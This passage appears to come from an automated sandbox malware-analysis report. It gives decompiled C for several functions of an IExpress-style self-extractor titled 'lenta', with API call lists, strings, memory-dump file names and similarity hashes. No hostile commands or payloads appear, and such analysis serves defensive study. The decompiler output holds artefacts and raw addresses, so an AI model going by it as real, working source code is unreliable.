						_t38 = E00944224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9487a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E009444B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0094321b
0x0094321e
0x00943221
0x0094343c
0x0094343e
0x0094343f
0x00943445
0x00943447
0x00000000
0x00943447
0x00943229
0x0094322a
0x0094322f
0x009433ec
0x009433f7
0x00943410
0x00943416
0x0094341d
0x0094342d
0x0094342d
0x00943438
0x00000000
0x00943438
0x00943237
0x00943243
0x00943243
0x00943246
0x009432ee
0x009432f4
0x009432f6
0x009433d4
0x009433d6
0x009433db
0x009433dc
0x009433de
0x009433df
0x00943370
0x00943372
0x00000000
0x00943372
0x009432fc
0x00943301
0x00943301
0x00943303
0x00943304
0x00943304
0x0094330a
0x0094330d
0x00000000
0x00000000
0x00943313
0x00943318
0x0094331a
0x00943331
0x00943332
0x0094333a
0x0094333d
0x0094337c
0x00943388
0x0094338f
0x00943394
0x00943396
0x009433a4
0x009433ab
0x009433b6
0x009433be
0x009433c3
0x009433c5
0x00943435
0x00943437
0x00943437
0x00000000
0x00943437
0x009433c7
0x009433c9
0x009433cc
0x00000000
0x009433cc
0x009433ad
0x009433b4
0x00000000
0x00000000
0x00000000
0x009433b4
0x00943398
0x00943399
0x0094339b
0x0094339c
0x0094339d
0x00000000
0x0094339d
0x0094334c
0x00943351
0x00943354
0x00000000
0x00000000
0x0094335c
0x00943362
0x00943364
0x00000000
0x00000000
0x00943366
0x00943367
0x00943369
0x0094336a
0x0094336b
0x00000000
0x0094336b
0x0094331c
0x00943323
0x00000000
0x00000000
0x00943329
0x0094332b
0x00000000
0x00000000
0x00000000
0x0094332b
0x0094324c
0x0094324c
0x0094324f
0x009432c8
0x009432ce
0x00000000
0x009432ce
0x00943251
0x00943256
0x00000000
0x00000000
0x00943271
0x00943277
0x00943279
0x00943298
0x0094329d
0x0094329f
0x00000000
0x00000000
0x009432b0
0x009432b6
0x009432b8
0x00000000
0x00000000
0x009432be
0x00943280
0x00943289
0x0094328e
0x00000000
0x0094328e
0x0094327b
0x00000000
0x0094327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00948598,00000200), ref: 00943271
GetDesktopWindow.USER32 ref: 009433E2
SetWindowTextA.USER32(?,lenta), ref: 009433F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00943410
GetDlgItem.USER32(?,00000836), ref: 00943426
EnableWindow.USER32(00000000), ref: 0094342D
EndDialog.USER32(?,00000000), ref: 0094343F

Strings

lenta, xrefs: 009433F1
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009432E2, 009432E7, 00943331, 00943344, 0094335B, 0094336A

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
API String ID: 2418873061-1804823871
Opcode ID: 993eebe98e8d9a8f510020b6126f804dd94eacd9ada2edb122040c5e9ba4a0ed
Instruction ID: 8406dbc2f929d807c34b4e94bdacf689e712777953c01b4f25108be4fa4a0c19
Opcode Fuzzy Hash: 993eebe98e8d9a8f510020b6126f804dd94eacd9ada2edb122040c5e9ba4a0ed
Instruction Fuzzy Hash: 455147343982407BFB316F355C8CFBB2A5CDB8BB54F50C528F206961E1DAA88E01E361

Uniqueness

Uniqueness Score: -1.00%

Function 00942CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00942CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x948004; // 0xec518a5e
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x949a3c = __ecx;
				memset(0x949140, 0, 0x8fc);
				memset(0x948a20, 0, 0x32c);
				memset(0x9488c0, 0, 0x104);
				 *0x9493ec = 1;
				_t20 = E0094468F("TITLE", 0x949154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x94858c = _t27;
					SetEvent(_t27);
					_t64 = 0x949a34;
					if(E0094468F("EXTRACTOPT", 0x949a34, 4) != 0) {
						if(( *0x949a34 & 0x000000c0) == 0) {
							L12:
							 *0x949120 =  *0x949120 & _t65;
							if(E00945C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x948a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x948184 != 0) {
										__imp__#17();
									}
									if( *0x948a24 == 0) {
										_t57 = _t65;
										if(E009436EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x949a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x949a34 & 0x00000100) == 0 || ( *0x948a38 & 0x00000001) != 0 || E009418A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00946517(_t57, 0x7d6, _t34, E009419E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00942390(0x948a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E009444B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0094468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x948588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x949a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E009444B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E009444B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0x948588);
										 *0x949124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x949124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00946CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00942cb5
0x00942cbc
0x00942cc7
0x00942cc9
0x00942cd1
0x00942cd3
0x00942cd9
0x00942ce9
0x00942cf9
0x00942d0e
0x00942d15
0x00942d1c
0x00942ef3
0x00000000
0x00942d2d
0x00942d34
0x00942d3b
0x00942d40
0x00942d48
0x00942d59
0x00942d84
0x00942e1f
0x00942e1f
0x00942e2e
0x00942e41
0x00942e5a
0x00942e62
0x00942e6c
0x00942e6c
0x00942e75
0x00942e77
0x00942e77
0x00942e84
0x00942e8b
0x00942e94
0x00000000
0x00942e96
0x00942e96
0x00942e9e
0x00942ea2
0x00942eba
0x00000000
0x00942ece
0x00942ede
0x00942eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00942eed
0x00942eef
0x00942eef
0x00942eef
0x00942eef
0x00942ea2
0x00942e86
0x00942e88
0x00942e88
0x00942e43
0x00942e48
0x00000000
0x00942e48
0x00942e30
0x00942e30
0x00942ef8
0x00942f01
0x00000000
0x00942f01
0x00942d8a
0x00942d8f
0x00942da1
0x00000000
0x00942da3
0x00942dae
0x00942db4
0x00942dbb
0x00000000
0x00942dca
0x00942dd3
0x00942df5
0x00942e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00942dd5
0x00942dde
0x00942de3
0x00942e04
0x00942e0a
0x00942e10
0x00000000
0x00942e10
0x00942dd3
0x00942dbb
0x00942da1
0x00942d5b
0x00942d5b
0x00942d5d
0x00942d69
0x00942d6e
0x00942f06
0x00942f06
0x00942f06
0x00942d59
0x00942f18

APIs

memset.MSVCRT ref: 00942CD9
memset.MSVCRT ref: 00942CE9
memset.MSVCRT ref: 00942CF9

Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00942D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00942D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00942DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00942DBD
CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00942E0A

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Strings

lenta, xrefs: 00942D04, 00942DD9, 00942DF0
INSTANCECHECK, xrefs: 00942D95
EXTRACTOPT, xrefs: 00942D4D
TITLE, xrefs: 00942D09
VERCHECK, xrefs: 00942E54

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
API String ID: 1002816675-2993962200
Opcode ID: 6904362d6c3758284f5de7b86b89b13da159452ade1b777f35e2d87629992a1e
Instruction ID: 3cfff56992cd0969e5847092c57e6fe4389755e24987d8e377396c4c62ff677f
Opcode Fuzzy Hash: 6904362d6c3758284f5de7b86b89b13da159452ade1b777f35e2d87629992a1e
Instruction Fuzzy Hash: EC51D374758301ABE724AB749C4AF7B369CFB87718F804429F941D61E1DBB88881E722

Uniqueness

Uniqueness Score: -1.00%

Function 009434F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E009434F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x9491d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x948584 = _t35;
					E009443D0(_t35, GetDesktopWindow());
					__eflags =  *0x948184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00944FE0, 0, 0, 0x948798);
					 *0x94879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E009444B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x94858c);
					_t38 =  *0x948584; // 0x0
					_t25 = E009444B9(_t38, 0x4b2, 0x941140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x9491d8 = 1;
						SetEvent( *0x94858c);
						_t39 =  *0x94879c; // 0x0
						E00943680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x94858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x94879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x009434fb
0x009434fe
0x00943665
0x00943666
0x00943666
0x00943668
0x0094366e
0x0094366e
0x00943671
0x00943671
0x00943677
0x00000000
0x00943677
0x00943504
0x00943506
0x00943507
0x0094350c
0x0094365b
0x0094365f
0x00000000
0x00000000
0x00000000
0x00943661
0x00943512
0x00943515
0x009435be
0x009435c1
0x009435d1
0x009435d8
0x009435de
0x009435f8
0x00943617
0x00943617
0x00943623
0x00943637
0x0094363d
0x00943642
0x00943644
0x00000000
0x00943646
0x00943652
0x00943657
0x00943658
0x00000000
0x00943658
0x00943644
0x0094351b
0x0094351d
0x0094354f
0x00943553
0x00000000
0x00000000
0x0094355f
0x00943565
0x0094357c
0x00943581
0x00943584
0x0094359b
0x009435a1
0x009435a7
0x009435ad
0x009435b3
0x009435b8
0x00000000
0x009435b8
0x00943586
0x00943588
0x00000000
0x00000000
0x00943590
0x00000000
0x00943590
0x00943524
0x00943535
0x00943541
0x00000000
0x00943549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00943535
EndDialog.USER32(?,?), ref: 00943541
ResetEvent.KERNEL32 ref: 0094355F
SetEvent.KERNEL32(00941140,00000000,00000020,00000004), ref: 00943590
GetDesktopWindow.USER32 ref: 009435C7
GetDlgItem.USER32(?,0000083B), ref: 009435F1
SendMessageA.USER32(00000000), ref: 009435F8
GetDlgItem.USER32(?,0000083B), ref: 00943610
SendMessageA.USER32(00000000), ref: 00943617
SetWindowTextA.USER32(?,lenta), ref: 00943623
CreateThread.KERNEL32 ref: 00943637
EndDialog.USER32(?,00000000), ref: 00943671

Strings

lenta, xrefs: 0094361D

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lenta
API String ID: 2406144884-2780258678
Opcode ID: b4475425470b3ae783f61585fe10aa4dc3c285185de5b937a3744a463c8b9a28
Instruction ID: 34d28181ed5b6caff3d24b6d431ef7e15abc6f0afc8d794484cf706c1918cdf4
Opcode Fuzzy Hash: b4475425470b3ae783f61585fe10aa4dc3c285185de5b937a3744a463c8b9a28
Instruction Fuzzy Hash: 4631C77926C301BBE7201F35EC4EF2B3A68E7CBB05F108915F616952A1CB758901EB55

Uniqueness

Uniqueness Score: -1.00%

Function 00944224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00944224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E009444B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x9488c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x9487a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x948598;
					_v36 = 1;
					_v32 = E00944200;
					_v28 = 0x9488c0;
					 *0x94a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x94a288(_t32, 0x9488c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x9488c0 != 0) {
							E00941680(0x9487a0, 0x104, 0x9488c0);
						}
						 *0x94a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x9487a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x9488c0);
					_t61 = 0x9488c0;
					_t4 =  &(_t61[1]); // 0x9488c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x9488c0; // 0x1291181
					_t44 = CharPrevA(0x9488c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x9488c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00944234
0x0094423c
0x00944240
0x009443b2
0x009443b7
0x009443c0
0x00000000
0x009443c5
0x0094424c
0x00944252
0x00944257
0x009443a4
0x009443a5
0x009443ab
0x00000000
0x009443ab
0x00944263
0x00944269
0x0094426e
0x00000000
0x00000000
0x0094427a
0x00944280
0x00944285
0x00000000
0x00000000
0x0094428d
0x00944293
0x009442e6
0x009442e9
0x009442ef
0x009442f4
0x009442f7
0x00944300
0x00944307
0x0094430e
0x00944315
0x0094431c
0x00944322
0x00944326
0x0094432d
0x0094432d
0x0094432f
0x00944334
0x00944343
0x00944349
0x0094434d
0x00944354
0x00944354
0x0094435d
0x0094436e
0x0094436e
0x0094437d
0x00944383
0x00944387
0x0094438e
0x0094438e
0x00944387
0x00944391
0x00944399
0x00000000
0x00944295
0x0094429f
0x009442a5
0x009442aa
0x009442aa
0x009442ad
0x009442ad
0x009442af
0x009442b0
0x009442b6
0x009442c2
0x009442c8
0x009442ce
0x009442e4
0x009442e4
0x00000000
0x009442ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00944236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0094424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00944263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0094427A
GetTempPathA.KERNEL32(00000104,009488C0,?,00000001), ref: 0094429F
CharPrevA.USER32(009488C0,01291181,?,00000001), ref: 009442C2
CharPrevA.USER32(009488C0,00000000,?,00000001), ref: 009442D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00944391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009443A5

Strings

SHBrowseForFolder, xrefs: 00944246
SHGetPathFromIDList, xrefs: 00944274
SHELL32.DLL, xrefs: 0094422F

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: bdd291ab2b8116d88ce1eaea786873e234ace40d04777e834efb930b30ff21f0
Instruction ID: d02f4cccceedc0619dcd903a33712728f1f534fb90b65b973e951b9c1d414614
Opcode Fuzzy Hash: bdd291ab2b8116d88ce1eaea786873e234ace40d04777e834efb930b30ff21f0
Instruction Fuzzy Hash: 00412678A48304AFD711AF70DC98F6F7BB8EB8A748F140269E951A3351CB758D01D761

Uniqueness

Uniqueness Score: -1.00%

Function 009444B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E009444B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x948004; // 0xec518a5e
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x948a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x949a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00941680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0094171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0094171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0094681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E009467C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0094681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E009467C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00946CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x009444b9
0x009444c4
0x009444cb
0x009444d8
0x009444e4
0x009444eb
0x009444ee
0x009444ef
0x009444ef
0x009444f1
0x009444f7
0x009444f8
0x0094467b
0x009444fe
0x00944509
0x00944518
0x00944525
0x00944562
0x00944568
0x00944568
0x0094456b
0x0094456b
0x0094456d
0x0094456e
0x00944572
0x00944578
0x0094457c
0x009445cb
0x00944607
0x00944607
0x0094460d
0x00944613
0x00944617
0x00000000
0x0094461d
0x00944623
0x00944626
0x00944628
0x00000000
0x00944628
0x009445cd
0x009445cd
0x009445cf
0x009445cf
0x009445d2
0x009445d2
0x009445d4
0x009445d5
0x009445db
0x009445de
0x009445e3
0x009445e9
0x009445ed
0x00000000
0x009445f3
0x009445fd
0x00000000
0x00944602
0x009445ed
0x0094457e
0x0094457e
0x00944580
0x00944580
0x00944583
0x00944583
0x00944585
0x00944586
0x0094458a
0x0094458c
0x0094458f
0x0094458f
0x00944591
0x00944592
0x0094459b
0x0094459e
0x009445a3
0x009445a9
0x009445ad
0x00000000
0x009445af
0x009445af
0x009445bf
0x0094462d
0x00944630
0x0094463d
0x0094464e
0x0094464e
0x0094463f
0x00944640
0x00944647
0x0094464c
0x00000000
0x00000000
0x0094464c
0x00944666
0x0094466d
0x0094466f
0x00944675
0x00944675
0x009445ad
0x00944527
0x0094452e
0x0094453f
0x0094453f
0x00944530
0x00944531
0x00944538
0x0094453d
0x00000000
0x00000000
0x0094453d
0x00944554
0x0094455a
0x0094455a
0x0094455a
0x00944525
0x0094468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
LocalAlloc.KERNEL32(00000040,00000065), ref: 009445A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 009445E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0094460D
MessageBeep.USER32(00000000), ref: 00944630
MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00944666
LocalFree.KERNEL32(00000000), ref: 0094466F

Part of subcall function 0094681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0094686E
Part of subcall function 0094681F: GetSystemMetrics.USER32(0000004A), ref: 009468A7
Part of subcall function 0094681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009468CC
